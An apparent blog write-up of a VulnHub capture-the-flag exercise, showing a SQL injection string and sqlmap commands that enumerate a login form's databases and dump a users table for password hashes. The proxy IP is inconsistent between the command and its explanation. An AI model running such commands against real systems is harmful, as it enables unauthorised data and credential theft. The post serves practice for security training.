Using sqlmap with web forms
I’m honing my pen testing skills in preparation for taking the OCSP test by doing CTFs, and one of the VMs that I download from VulnHub was Pinky’s Palace. I ran a nmap scan and was identified services that were running on the VM and got to a login page in the website.
I viewed the source of the page and didn’t see anything that I could use to easily bypass the form. I then tried SQL injection on the webpage with
'or'1'='1 and didn’t get any results back, which made me think that the machine was not vulnerable to SQL injection attacks. I got stumped for a while because there were no other vectors for me to use to get on the host, that I could see. I researched tools that are capable of automating SQL attacks and found sqlmap. Running sqlmap with the following command allowed me to enumerate the databases on the server.
sqlmap -u http://127.0.0.1:8080/littlesecrets-main/login.php --proxy http://192.168.100.192:31337 --data="user=admin&pass=pass&submit=Login" --level 5 --dbs
-u http://127.0.0.1:8080/littlesecrets-main/login.php identifies the webpage that we want sqlmap to interact with.
--proxy http://192.168.100.196:31337 tells sqlmap to route all requests through that proxy, something that is required due to the security configurations on the nginx web server
--data="user=admin&pass=pass&submit=Login" gives sqlmap the information to submit on the web form to interact with the backend SQL database
--level 5 is the number of tests to run on the server, 1 being the default and 5 being the highest
--dbs enumerates the databases in on the server
After sqlmap ran I got the following results:
From there I needed to enumerate the tables in the databases, and all that was required was to replace
--tables and wait, after several hours I received the following results:
There are too many tables to fully show in the databases, but the one of interest to me is the user table in
pinky_sec_db. Now I need to dump that table to grab the hashes so I can try to crack them. I do that with:
sqlmap -u http://127.0.0.1:8080/littlesecrets-main/login.php --proxy http://192.168.100.192:31337 --data="user=admin&pass=pass&submit=Login" --level 5 --dump users with
--dump identifying what table to dump out of the database.
With this output, I was able to retrieve the password hashes for the two users on the website to try to crack through various other methods to gain further access to the server.